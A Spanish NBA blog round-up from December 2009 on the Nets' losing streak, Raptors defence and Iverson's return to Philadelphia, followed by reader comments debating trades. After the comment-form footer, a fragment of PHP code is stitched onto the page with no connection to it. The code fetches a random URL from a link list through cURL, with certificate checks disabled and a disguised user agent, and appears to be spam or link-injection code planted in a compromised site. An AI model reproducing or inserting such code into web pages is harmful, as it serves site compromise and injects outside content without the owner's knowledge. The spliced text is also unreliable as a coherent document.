La Crónica (02/12/2009)

03 de December de 2009 por txusma

Ayer fue el día en el que los Nets se convirtieron en el peor equipo de la historia a estas alturas de la campaña. Terrorífica cifra: 0-18 y bajando. Hurgando en la llaga, anoche “Buscacontratos” Dampier le pegó un meneo de los buenos a Brook López, y Jason Kidd, que ya se había acostumbrado a sufrir las de Caín contra Devin Harris, le devolvió todas las que pudo. El via crucis no ha hecho más que empezar para los Nets. Próximo test: la defensa de Larry Brown.

Por su parte, los Mavs se ponen segundos en el Oeste, porque los Suns volvieron a perder, esta vez en Cleveland. Se estrellaron contra un auténtico muro de 10 tipos rozando las dobles figuras. El partido más solidario que se recuerda allí. El mejor fue Ilgauskas (que ya es el jugador con más partidos ha vestido la camiseta de los Cavs en toda la historia). ¿Se trata de una declaración de nuevas intenciones? Que nadie apueste por ello.Al buen nivel de Cavs respondieron los Magic ganando fácil a los Knicks, y también los Hawks dándole una soberana paliza a los Raptors. Llevamos tiempo avisando de la ruinosa defensa de Triano. Los 146 puntos que les endosaron anoche justificaron cualquier crítica en ese sentido. No es que los halcones hayan sido nunca anotadores compulsivos. La aportación de Calderón ahora mismo no llega a valer el pastizal que cobra… pero lo de Bargnani (0 rebotes) y Bosh (2 puntos) entra en el terreno de lo lamentable.

Los partidos más emocionantes de la jornada los protagonizaron los modestos de la liga. Marc estuvo a punto de tirar por la borda un correcto partido con una inoportuna falta a Sessions que le daba la oportunidad a los Wolves de empatar un partido que tenían perdido. Sessions no fue capaz de meter un tiro libre y Marc tampoco fue capaz de coger los rebotes que debió asegurar en ese tramo decisivo. Por suerte la cosa terminó bien y los Grizzlies aseguraron la ilusionante 6ª victoria en sus últimos 10 partidos.

En la capital, con Arenas, Jamison y Butler en cancha, fue el diminuto Earl Boykins quien asumió el mando para ganar un complicadísimo partido contra los Bucks. El público coreaba aquello de MVP, MVP. Parece mentira que no tuviera equipo al inicio del campeonato. Se rumorea traspaso ilustre en la capital, por cierto. Nos mantendremos atentos.

También nos parecería lógico algún movimiento para los Kings viendo el panorama. Ayer se impusieron a los Pacers y por primera vez desde hace siglos están en positivo. No obstante no les vale para meterse en puestos de Playoffs del Wild Wild West. Los Clippers, undécimos de la conferencia, volvieron a perder anoche contra los Rockets. En el Este tendrían plaza en la postemporada.

Finalmente, los Sixers celebraron la más que posible repesca de AI3 palmando su 8º consecutivo contra los Thunder de Durant, y los Bulls le dieron para el pelo a unos nerviosísimos Pistons que estropearon la visita de Ben Gordon al United.

PREMIOS

MVP: Por un lado, un crack consolidadísimo, Dirk Nowitzki (24-7-8), y por el otro, un crack que está por venir, Tyreke Evans (25-5-6). Al final va a resultar que el draft de 2009 no era tan malo… No me olvido de Kevin Durant, 33 puntos y 5 rebotes.

Rookie: Por detrás de “Reke”, Jeff Teague, cuajando una buena actuación en los minutos disfrutados en Atlanta, Toney Douglas, que a pesar de los mareos de D’Antoni sigue a buen nivel, Sam Young, que parece que poco a poco va ganando minutos en los Grizzlies, y Chase Budinger, mostrando su clase en la victoria frente los Clippers.

Sorpresa: Aprovechando los minutos recibidos por el chaparrón que caía a los Raptors, Marco Bellinelli ha cuajado uno de los mejores partidos del año con 19 puntos. En el juego interior, Nick Collison (18-7) y Brad Miller (16-7-6) también pueden irse a dormir contentos.

Decepción: 2 puntos, 5 rebotes y una pérdida es el triste balance de Chris Bosh en la humillación sufrida por los Raptors a manos de los Hawks. Eso sí, el ex de Georgia Tech jugó tan solo 15 minutos por problemas de faltas.

Esfuerzo en vano: 33 puntos de Danny Granger Ya vuelves a aparecer por aquí con regularidad, ¿eh? Otro que a lo mejor espera la llegada de Iverson es Andre Iguodala. Ayer 28 puntos, 6 rebotes y 5 asistencias que no sirvieron para nada.

RAZONES PARA TRASNOCHAR

Esta madrugada de jueves a viernes traerá tres buenos partidos, unos mejores que otros pero todos ellos en canchas del Oeste. El primero enfrentará a dos de los cuatro campeones que ha visto el siglo XXI; será en la visita de los Celtics a los Spurs (2h00). Cuando éste acabe, hacia las 4h30, otro de los equipos con anillo reciente, los Heat, tratará de frenar a Melo y compañía en Denver. A la misma hora se verán las caras en Oakland dos de los conjuntos más diferentes de la liga, Rockets y Warriors.

LA NOTICIA DEL DÍA

Evidentemente la noticia del día vuelve a girar entorno a Allen Iverson. Se ha confirmado su fichaje por los Sixers, que le recibirán como agua de mayo ahora que Louis Williams se ha lesionado para 2 meses. Veremos cómo acaba esta segunda etapa de “The Answer” en Philadelphia.

VíDEO

Buen pinchito de merluza el que se lleva Amir Johnson de parte de un especialista como Josh Smith y no menos bueno el que le propina LeBron James a Jason Richardson. También podemos ver a Caron Butler por partido doble y a los Cavs efectuando una jugada de libro…

Comenta

25 comentarios a esta entrada

  1. Chris dice:
    #1

    El comienzo de campaña de los raptors esta siendo francamente decepcionante, la defensa es un autentico coladero, Calde y Hedo no terminan de coger el punto de juego, Bargnani sigue a lo suyo (anotando pero siendo un flojo) y Bosch que estaba fenomenal se casca un truño de partido, espero que sea un dia malo de esos que tiene cualquiera y no un dejarse llevar como el año pasado.
    Yo esperaba mucho mas de este equipo… ¿como reaccionara Colangelo? Apuesto por medidas drasticas si esto no da muestras de cambio antes de Navidad. Triano a la calle, tradear a Bosch y traer un center de garantias y darle la titularidad a Jack… Algo asi.
    ¿Por cierto que rumor es ese del traspaso en la capital? Cuenta, cuenta…

    *perdon por la ausencia de acentuacion, en el teclado con el que estoy ahora estan kaput.

      Citar

  2. TheDeerHunter dice:
    #2

    La rajada de Arenas el otro día parece la clave.
    Butler en el punto de mira. Arenas de 2, por lo que buscan otro base.

      Citar

  3. MagicJohnson32 dice:
    #3

    Bosh está muy bien en ataque pero en defensa, missing total. Y eso, con Bargnani al lado, pues me dirás… Es de risa cómo llegan los rivales hasta debajo del aro. Van 11 partidos seguidos encajando más de 100 puntos, siete de ellos encajando más de 110.

    Está claro: es la hora de Nesterovic.

    Es broma.

      Citar

  4. Txusma dice:
    #4

    Después de estar 2 años sin Arenas con Butler y Jamison a un nivel mayusculo como se puede dudar mínimamente de su implicación? Yo es que no lo entiendo. Yo soy Butler y espero a Arenas a la salida del entreno…
    Pero vaya que con un jugador como Arenas tampoco vas a traer a un mega base así que supongo q aprovecharian para liberar mucho salario, traerse algun jovenzuelo o mejorar otras posiciones. Pero repito, que poquito a tardado Arenas en cargarse la dinamica del equipo…

      Citar

  5. pcerezo dice:
    #5

    Bosh jugador bajo sospecha. Buscando contrato en la liga claramente la mente puesta en el verano de 2010, mucha anotación y rebote pero nada de pelea y defensa. Me reitero, los contratos de Bargnani y Turkoglu un auténtico lastre. Turkoglu típico jugador que en un contexto brilla y cuando se le saca de esa dinámica aparecen carencias…la sombra de Howard es alargada.
    Los Suns se desinflan en la carretera y en el este, donde menos podíamos imaginar.
    Los Kings tremedos. Con lo que tienen estar en positivo es increíble. Estos entrenadores Westphal, Adelman, Larry Brown, cada uno a su estilo tienen un conocimiento muy, muy grande del juego. Kevin Martin por? Se hacen apuestas…

    Un saludo,
    Pablo

      Citar

  6. xapa_croack dice:
    #6

    En toronto no defiende ni el seguridad, veremos lo dura trayano.

      Citar

  7. sergio dice:
    #7

    Pues podriamos matar dos pajaros de un tiro…. Kevin Martin por Turkoglu??

      Citar

  8. CAMPO2 dice:
    #8

    como la medida de Colangelo sea cargarse a Triano y poner a su ojito derecho Lavaroni, los Raptors a luchar contra mis Nets por la 1ª posicion del Draft.

      Citar

  9. Txusma dice:
    #9

    Caramba… Kevin Martin x Turkoglu… Hasta podría cuadrar sin mirar salarios ni nada.

      Citar

  10. sergio dice:
    #10

    Curiosas las estadisticas de Houston. 9 jugadores con mas de 20 minutos y todos contribuyendo a su manera. Son el ejemplo perfecto de como un grupo jugando en equipo multiplica sus posibilidades. Eso si, todos en el equipo son unos currantes, no como otros…..

    Los subidones de mi tocayo Sergio coinciden con el bajon de Marc. Traspaso de karma quizas?? 19 rebotitos para Camby y 18 para Jeff Foster. Este ultimo tiene imanes en las manos o algo asi… aunque solo sepa hacer eso. Por favor que alguien me explique porque Bargnani sigue jugando de teorico 5 en los Raptors… cuando 10 jugadores les hacen mas de 9 puntos,nadie se para a pensar en Toronto??ç

    Partidazo de O’neal en 20 minutitos. Lo necesitan a su mejor nivel en Cleveland para optar a algo. Carter se sigue tirando lo que le llegue, aunque vea que casi todos sus compañeros estan mas acertados que el… Magnificos 2 ultimos partidos de Kidd. Creia que nunca volveria a verlos… aunque si tenia que ser contra alguien era contra estos Nets. Y el anterior partido fue contra unos Sixers que no ganan ni teniendo un 20-60-90 en porcentajes. Si Oklahoma te saca 14 rebotes de ventaja teniendo a Krstic de pivot….. Por cierto, lo de Brand es para anularle el contrato por incompetente y descomprometido. Me lo hubiese esperado de muchos pero no de ti Elton.

      Citar

  11. sergio dice:
    #11

    Pues si Txusma… podria servir a ambos. Igual que un Kaman/Camby + Gordon/Thornton por Turkoglu y Bargnani. (cuando vuelva Griffin claro…)

      Citar

  12. sergio dice:
    #12

    un 50-60-90 en porcentajes para los Sixers que me he equivocado jaja

      Citar

  13. MagicJohnson32 dice:
    #13

    No fastidiéis hombre, ahora va a resultar que Kevin Martin va a arreglar los problemas defensivos de los Raptors, jojo… Lo que menos necesita Toronto es un Kevin Martin.

    Ah, y ¡¡¡larga vida a Jason Kidd!!!

      Citar

  14. Txusma dice:
    #14

    Evidentemente no lo decía por la defensa pero también se ha dicho siempre que a Toronto le falta una anotador exterior como el comer y no se si Turkoglu cumple esa función. Evidentemente habría que encontrar algo más en un hipotético trade que saque a Bargnani de la titularidad…

      Citar

  15. sergio dice:
    #15

    Hombre Magic… esta claro que necesitan defensa… pero al menos no tendrian dos bases que se molestan como ahora… y tampoco es que tengan a nadie como Martin para atacar el aro o tirar desde fuera. Yo un defensor lo conseguiria por Bargnani pero dudo que nadie de mucho por el o que Colangelo se separe de su ojito derecho.

      Citar

  16. Love Denise dice:
    #16

    si yo fuera colangelo daria de margen 15 partidos más, si esto no funciona, resetearía los Raptors, traspasando a Calderon, Turkoglu y Bargnani por gente que acabe salarios ya sean estrellas o paquetes (como el de K.Brown-Gasol) y por algunas futuras rondas de Draft, dando la temporada por acabada , y a partir del año que viene reconstruir el equipo con gente joven procedente de altas elecciones de draft e intentando fichar agentes libres de nivel medio por 5-6 $ (dudo que aunque los Raptors tengan $$, los James, Wade y Cia qieran ir a Toronto), y así en 2 años podrían tener una buena base sólida y con futuro (que tomen nota de los Thunders).
    Mejor es ganar 20 partidos con un equipo de 50 $, que ganar 30 con uno de 70$

    Viendo los salarios de los Nets, me da a mí que el año que viene van a tener un equipazo, con Harris, Courtney Lee, Douglas-Roberts, Brook Lopez, el nº1-5 del Draft y 45 millones $, se puede hacer un equipo apañado.

      Citar

  17. CAMPO2 dice:
    #17

    Colangelo hace pintas de chulo de discoteca y se piensa que tiene razon en todo, por lo que sus apuestas personales(Bargnani y Turkoglu) no los traspasa ni jarto grifa.

      Citar

  18. Txusma dice:
    #18

    Espera, espera q tengo una idea mejor:

    K.Martin x Calderon

    Pq a quien le importan realmente los Raptors? 😛

      Citar

  19. sergio dice:
    #19

    Hombre… a mi los Raptors por eso de ser una franquicia europeizada me cae algo simpatica…. no por su competitividad desde luego. Tampoco creo que tengamos nosotros que apoyar un Kevin Martin x Calderon para que se quiten minutos los dos bases que tenemos por aquellas tierras…. aunque Colangelo es capaz, dudo que los Kings quieran otro base.

      Citar

  20. sergio dice:
    #20

    Anda mira…. por fin un dato objetivo de porque Blake tiene que salir de una vez de la titularidad en Portland:

    http://www.nba.com/2009/news/features/john_schuhmann/12/03/numbersgame.miller/index.html

      Citar

  21. Txusma dice:
    #21

    A un equipo europeizado no le meten 145 puntos. Apostar por jugadores no americanos o que no hayan pasado la vida en la NAB no europeiza un equipo. Hace falta algo más, sobre todo a nivel de entrenador. A lo mejor el error es intentar jugar a la americana con jugadores de estilo europeo

      Citar

  22. sergio dice:
    #22

    Yo solo me referia a nacionalidades de los jugadores (2 italianos, 1 español, 1 turco, 1 esloveno, )…. lo del estilo (no defender) y la posicion de la franquicia es digno de los Nuggets ochenteros solo que sabiendo que nunca seran recordados (y que los rivales siempre les metian mas puntos de los que ellos hacian)

      Citar

  23. sergio dice:
    #23

    Vamos… que de hecho tienen a Alex English de asistente de Triano… todo concuerda jaja

      Citar

  24. M dice:
    #24

    Pues este es el año en que los raptors se juegan buena parte de su futuro como franquicia, porque es equipo que ha contratado fuerte a algunos jugadores para hacer una base sólida, un buen año que permita a Bosh quedarse, que hagan mejores años, que sean cada vez más fuertes…y se han despertado antes de apoyar la cabeza en la almohada. En fin. Y lo de Cleveland no me sorprende tanto, quizá no a ese nivel, pero el año pasado ya tuvieron muchos partidos así y esa fue la clave de su buen año, yo creo.

      Citar

  25. xapa_croack dice:
    #25

    si se va bosh, que mercenario iria a toronto?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>